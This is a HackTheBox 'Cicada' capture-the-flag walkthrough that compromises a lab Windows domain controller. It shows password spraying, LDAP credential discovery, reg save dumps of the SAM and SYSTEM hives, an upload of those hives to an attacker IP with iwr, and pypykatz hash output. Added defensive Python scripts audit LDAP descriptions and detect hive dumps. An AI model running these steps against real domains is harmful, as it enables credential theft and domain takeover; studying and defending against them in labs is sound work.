Domain LDAP Enumeration - HackTheBox - Cicada
A port scan shows 88, 389 and 445 open, so this is clearly a domain controller.
First enumerate SMB: smbclient -L //10.10.11.35
Anonymous login works: smbclient //10.10.11.35/HR
This leaks an account's default password:
Cicada$M6Corpb*@Lp#nZp!8
nxc winrm 10.10.11.35
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
Next, anonymous LDAP enumeration from outside the domain:
impacket-lookupsid cicada/guest@10.10.11.35 -no-pass
[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
kerbrute passwordspray -d cicada -v --dc 10.10.11.35 users.txt 'Cicada$M6Corpb*@Lp#nZp!8'
Spray result: michael.wrightson
Enumerating the SYSVOL share gives a group policy object showing that emily.oscars can log in remotely (WinRM).
Authenticated enumeration from outside the domain:
ldapsearch -H ldap://10.10.11.35 -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "dc=cicada,dc=htb" "(objectClass=user)"
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
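The description attribute above is the misconfiguration that gives up the next credential. As an added example (not part of the original writeup), the following Python audits an LDIF dump of user objects for descriptions that mention passwords or contain password-shaped tokens, so a defender can find this pattern in their own directory before an attacker does. The LDIF sample is constructed to mirror the ldapsearch output above; the second entry is invented as a benign control.

```python
import base64
import re

# Constructed LDIF sample in the shape of ldapsearch output (the second entry is invented as a benign control).
SAMPLE_LDIF = """\
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3

# Sarah Dantelia, Users, cicada.htb
dn: CN=Sarah Dantelia,CN=Users,DC=cicada,DC=htb
objectClass: user
cn: Sarah Dantelia
description: HR department, desk 4B
"""


def parse_ldif(text):
    """Parse a minimal LDIF dump into a list of {attribute: [values]} dicts, one per entry.

    Handles the three things ldapsearch output actually does: '#' comment lines,
    blank-line entry separators, base64 values ('attr:: ...') and folded
    continuation lines that start with a single space.
    """
    entries, current, last_attr = [], None, None
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
            current, last_attr = None, None
            continue
        if line.startswith(" ") and current is not None and last_attr:
            current[last_attr][-1] += line[1:]  # folded continuation of the previous value
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):  # 'attr:: <base64>' form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if current is None:
            current = {}
        current.setdefault(attr, []).append(value)
        last_attr = attr
    if current:
        entries.append(current)
    return entries


# Words that suggest someone wrote a credential into a free-text field.
KEYWORDS = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|secret)\b", re.I)


def looks_like_secret(token):
    """Heuristic: a token of 8+ chars drawing on at least three character classes."""
    classes = sum(bool(re.search(p, token)) for p in (r"[A-Z]", r"[a-z]", r"\d", r"[^\w\s]"))
    return len(token) >= 8 and classes >= 3


def audit_descriptions(entries):
    """Return (dn, description) pairs whose description looks like it holds a credential."""
    findings = []
    for entry in entries:
        for desc in entry.get("description", []):
            if KEYWORDS.search(desc) or any(looks_like_secret(t) for t in desc.split()):
                findings.append((entry["dn"][0], desc))
    return findings


if __name__ == "__main__":
    for dn, desc in audit_descriptions(parse_ldif(SAMPLE_LDIF)):
        print(f"SUSPICIOUS description on {dn}: {desc!r}")
```

Feed it the output of the ldapsearch command above (or any `(objectClass=user)` dump) and review each hit; a hit on the keyword rule is worth reading even when the token rule stays quiet, because people also write hints rather than the password itself.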
Back to SMB enumeration:
nxc smb 10.10.11.35 -d cicada -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
DEV is readable:
smbclient //10.10.11.35/DEV -U cicada/david.orelious%'aRt$Lp#7t*VQ!3'
It contains a backup script, which yields:
emily.oscars:Q!3@Lp#M6b*7t*Vt
evil-winrm -i 10.10.11.35 -u cicada.htb\\emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Judging from the backup script, this account probably holds a backup privilege.
whoami /priv confirms it has SeBackupPrivilege.
reg save hklm\sam c:\windows\temp\sam
reg save hklm\system c:\windows\temp\system
iwr -method put -uri 10.10.16.43/sam -in sam
iwr -method put -uri 10.10.16.43/system -in system
pypykatz registry --sam sam system
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
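The last stage relies on two things a defender can watch for: a non-backup account being granted SeBackupPrivilege at logon (Security event 4672, "Special privileges assigned to new logon") and reg.exe saving the SAM, SYSTEM or SECURITY hives (process creation event 4688 with command-line auditing enabled). As an added example that is not part of the writeup, the Python below runs that detection over a handful of constructed event records (simplified dicts, not real log exports) and correlates the two signals per account. The allow-list of principals expected to hold the privilege is an assumption for the example.

```python
import re

# Constructed Security event records in a simplified dict form (not real log exports).
# 4672 = special privileges assigned to new logon; 4688 = process creation with command line.
SAMPLE_EVENTS = [
    {"event_id": 4672, "account": "CICADA\\emily.oscars",
     "privileges": "SeBackupPrivilege SeRestorePrivilege"},
    {"event_id": 4688, "account": "CICADA\\emily.oscars",
     "command_line": r"reg save hklm\sam c:\windows\temp\sam"},
    {"event_id": 4688, "account": "CICADA\\emily.oscars",
     "command_line": r"reg save hklm\system c:\windows\temp\system"},
    {"event_id": 4672, "account": "NT AUTHORITY\\SYSTEM",
     "privileges": "SeBackupPrivilege SeTcbPrivilege"},
    {"event_id": 4688, "account": "CICADA\\svc_backup",
     "command_line": r"wbadmin start backup -backupTarget:E:"},
    {"event_id": 4688, "account": "CICADA\\john.smoulder",
     "command_line": r"reg query hklm\software\microsoft"},
]

# Assumed allow-list: principals that legitimately receive SeBackupPrivilege in this environment.
EXPECTED_BACKUP_PRINCIPALS = {"NT AUTHORITY\\SYSTEM", "CICADA\\svc_backup"}

# Hives whose offline copies yield local password hashes or the LSA boot key.
SENSITIVE_HIVES = re.compile(r"\b(hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)
REG_SAVE = re.compile(r"^\s*(?:.*\\)?reg(?:\.exe)?\s+(save|export)\s+(\S+)", re.I)


def is_hive_dump(command_line):
    """True when the command line is reg.exe saving/exporting SAM, SYSTEM or SECURITY."""
    m = REG_SAVE.match(command_line)
    return bool(m) and bool(SENSITIVE_HIVES.search(m.group(2)))


def detect(events, allow=EXPECTED_BACKUP_PRINCIPALS):
    """Return (alert_kind, account) tuples for the two signals described above."""
    alerts = []
    for ev in events:
        acct = ev.get("account", "")
        if (ev["event_id"] == 4672
                and "SeBackupPrivilege" in ev.get("privileges", "")
                and acct not in allow):
            alerts.append(("backup_priv_logon", acct))
        if ev["event_id"] == 4688 and is_hive_dump(ev.get("command_line", "")):
            alerts.append(("hive_dump", acct))
    return alerts


def correlate(alerts):
    """Accounts that both logged on with SeBackupPrivilege and dumped a sensitive hive."""
    kinds_by_account = {}
    for kind, acct in alerts:
        kinds_by_account.setdefault(acct, set()).add(kind)
    return sorted(acct for acct, kinds in kinds_by_account.items()
                  if {"backup_priv_logon", "hive_dump"} <= kinds)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for kind, acct in found:
        print(f"{kind:18s} {acct}")
    print("high-severity:", correlate(found))
```

Either signal alone is noisy (backup agents legitimately hold the privilege, and admins do export hives), which is why the correlation step exists; in practice the allow-list should be derived from the "Back up files and directories" user right as actually assigned by group policy, and the SAM and SYSTEM hive copies themselves should also be caught by file-system auditing on unusual destinations such as c:\windows\temp.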